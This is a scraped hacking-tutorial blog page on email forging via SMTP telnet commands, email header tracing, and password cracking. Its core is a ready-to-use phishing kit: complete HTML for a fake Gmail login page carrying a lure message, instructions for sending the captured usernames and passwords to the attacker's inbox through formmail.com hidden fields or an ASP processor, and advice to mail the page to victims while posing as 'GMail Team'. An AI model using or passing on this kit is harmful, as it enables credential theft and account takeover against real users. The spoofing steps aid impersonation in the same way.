-: EMail Forging :-2) EMail Forging :- Email forging allows an attacker to disguise the source of an email and send it to the victim. Most attackers use this technique to fool the victim into believing that somebody else has send the particular email. The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user. Typically an attacker carries out email forging by following steps: 1) Start Command Prompt and type the following command- c:/>telnet smtp.mailserver.com 25 or c:/>telnet mail.domain.com 25 example:- c:/>telnet smtp.gmail.com 25 The above command opens a telnet connection to the specified remote mail server on port-25. Where port-25 is the default SMTP port on which outgoing mail daemon runs. 2) Once you are connected to the mail daemon of remote mail server, you would be greeted with a message similar to following:-  If you are not familiar with the smtp mail daemon commands then enter the keyword 'help' at daemon which may reveal all the supporting commands as shown below.  3) The correct sequence of commands to be executed is:- a) helo mailserver1.com b) mail from:abc@mailserver1.com c) rcpt to:xyz@mailserver2.com d) data e) .(dot command represents end of mail body) This all as shown in figure below: 
|
Click And BuyNow
weather
Showing posts with label password hacking. Show all posts
Showing posts with label password hacking. Show all posts
EMail Forging
EMail Hacking
-: EMail Hacking :-
All email communications on the internet are possible by two protocols: 1) Simple Mail Transfer Protocol (SMTP port-25) 2) Post Office Protocol (POP port-110)
E-Mail hacking consists of various techniques as discussed below.
1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram.
The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email. A typical email header looks something like this:
From Barr Thu Jan 3 05:33:26 2008
X-Apparently-To: prasannasherekar@yahoo.co.in via 203.104.16.34; Thu, 03 Jan 2008 05:25:38 +0530
X-YahooFilteredBulk: 189.160.34.89
X-Originating-IP: [189.160.34.89]
Return-Path: <atiles@destatis.de>
Authentication-Results: mta113.mail.in.yahoo.com from=destatis.de; domainkeys=neutral (no sig)
Received: from 189.160.34.89 (HELO dsl-189-160-34-89.prod-infinitum.com.mx) (189.160.34.89) by mta113.mail.in.yahoo.com with SMTP; Thu, 03 Jan 2008 05:25:38 +0530
Received: from dvapa ([141.203.33.92]) by dsl-189-160-34-89.prod-infinitum.com.mx with Microsoft SMTPSVC(6.0.3790.0); Wed, 2 Jan 2008 18:03:26 -0600
Message-ID: <477C264E.3000604@destatis.de>
Date: Wed, 2 Jan 2008 18:03:26 -0600
From: "Barr" <atiles@destatis.de> Add to Address Book
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: prasannasherekar@yahoo.co.in
Subject: angel rubberneck
Content-Type: multipart/related; boundary="------------030604060204000701040304"
Content-Length: 16433
The above email header gives us the following information about it's origin and path:
a) Sender's email address :- atiles@destatis.de
b) Source IP address :- 141.203.33.92
c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx
d) Email client :- Thunderbird 2.0.0.6
 | There are lots of ready-made tools available on the internet which performs email tracing very effectively and shows exact geographical location for email sender on the world map. |
Recommended Tools | |
NeoTrace | http://www.neotrace.com |
VisualRoute | http://visualroute.visualware.com |
E-MailTracker | http://www.visualware.com |
Cracking GMail Account Password
-: Cracking GMail Account Password :-
Here is the most effective technique for cracking GMail Accounts Passwords.
This method uses 'Social Engineering' rather than 'Phishing'.
Follow the steps as given below :-
Success Rate :- 90%
Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-
The HTML code for above login screen created by me is given below-
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type=text/css>
<!--
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin-top:2}
.c {width: 4; height: 4}
.bubble {background-color:#C3D9FF}
.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}
.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}
.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; }
.feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; }
// -->
</style>
<title>
Gmail: Email from Google
</title>
</noscript>
</head>
<body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()">
<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
<tr valign=top>
<td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript>
</td>
<td width=99% bgcolor=#ffffff valign=top>
<table width=100% cellpadding=1>
<tr valign=bottom>
<td><div align=right> </div></td>
</tr>
<tr>
<td nowrap=nowrap>
<table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
<script>utmx_section("title")</script>
<td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td>
<td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
</noscript>
</tr>
<tr>
<td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
<td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table width=94% align=center cellpadding=5 cellspacing=1>
<tr>
<td valign=top style="text-align:left"><b>A Google approach to email.</b>
<td valign=top>
</tr>
<tr>
<td width=75% valign=top>
<p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>,
<br><br>
<table align="center" width="75%">
<tr><td><font size="-1">
We are moving database partly to our new server.<br>
This require your account verification for proper redirection...!<br>
Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br>
Repply this message within 72 hours.<br>
Thank You ! for your Co-Operation........!
</font><br><br>
<b>GMail Team</b>
</td></tr></table>
</font>
</p>
</noscript>
</noscript> </td> <td valign=top>
<div id=login>
<form id="gaia_loginform" action="login.asp" method="post">
<div id="gaia_loginbox">
<table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0">
<tr>
<td valign="top" style="text-align:center" nowrap="nowrap"
bgcolor="#e8eefa">
<div class="loginBox">
<table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
<tr>
<td colspan="2" align="center">
<table>
<tr>
<td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td>
<td valign="middle"> <font size="+0"><b>Account</b></font>
</td>
</tr>
</table></td>
</tr>
<script type="text/javascript"><!--
function onPreCreateAccount() {
return true;
}
function onPreLogin() {
if (window["onlogin"] != null) {
return onlogin();
} else {
return true;
}
}
--></script>
<tr>
<td colspan="2" align="center"> </td>
</tr>
<tr>
<td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl">
Username: </span> </div></td>
<td> <input type="text" name="Email" id="Email"
size="18" value=""
class='gaia le val'
/> </td>
</tr>
<tr>
<td></td>
<td align="left"> </td>
</tr>
<tr>
<td align="right"> <span class="gaia le lbl"> Password:
</span> </td>
<td> <input type="password"
name="Passwd" id="Passwd"
size="18"
class="gaia le val"
/> </td>
</tr>
<tr>
<td> </td>
<td align="left"> </td>
</tr>
<tr>
<td> </td>
<td align="left"> <input type="submit" class="gaia le button" name="signIn"
value="Move"
/> </td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</div>
</form>
</div> <br>
<table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links>
<tr bgcolor=#E8EEFA>
<td valign=top align="center"><font size=+0><br>
<font size="-1"> <a href="http://mail.google.com/mail/help/intl/en/about.html">About
Gmail</a
> <a href="http://mail.google.com/mail/help/intl/en/about_whatsnew.html">New
features!</a> </font> </font></td>
</table>
</noscript>
</table>
<br>
<table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
<td class=bubble rowspan=2 style=text-align:left>
<div align=center>
<font size=-1 color=#666666>©2008 Google -
<a href="http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer">Gmail for Organizations</a> -
<a href="http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr">Gmail Blog</a> -
<a href="http://mail.google.com/mail/help/intl/en/terms.html">Terms</a>
- <a href="http://mail.google.com/support/">Help</a>
</font>
</div>
</td>
<td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
</tr>
<tr>
<td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
<td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
</tr>
</table>
</body>
</html>
Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-
1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-
Your form must start with the following <form> HTML tag:<br>
<form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192">
You must also include the following hidden configuration fields
in your form so that formmail.com knows what account and form processor
to use on the submitted data:
<input type="hidden" name="_pid" value="94566">
<input type="hidden" name="_fid" value="36THG54Z">
You must also inform this form processor who you wish to have your
form results emailed to. To do so, you must include a hidden form
field that specifies the recipient:
<input type="hidden" name="recipient" value="your email address">
Please Note: the above field will work, but an even better solution
is to use the ID number for that email address (thus hiding your
address from spammers):
<input type="hidden" name="recipient" value="1">
OR
2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.
Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.
As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!
Done.......?
-: Password Hacking :-
-: Password Hacking :-
Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :
1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
| Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly. |
Try us on Wibiya!
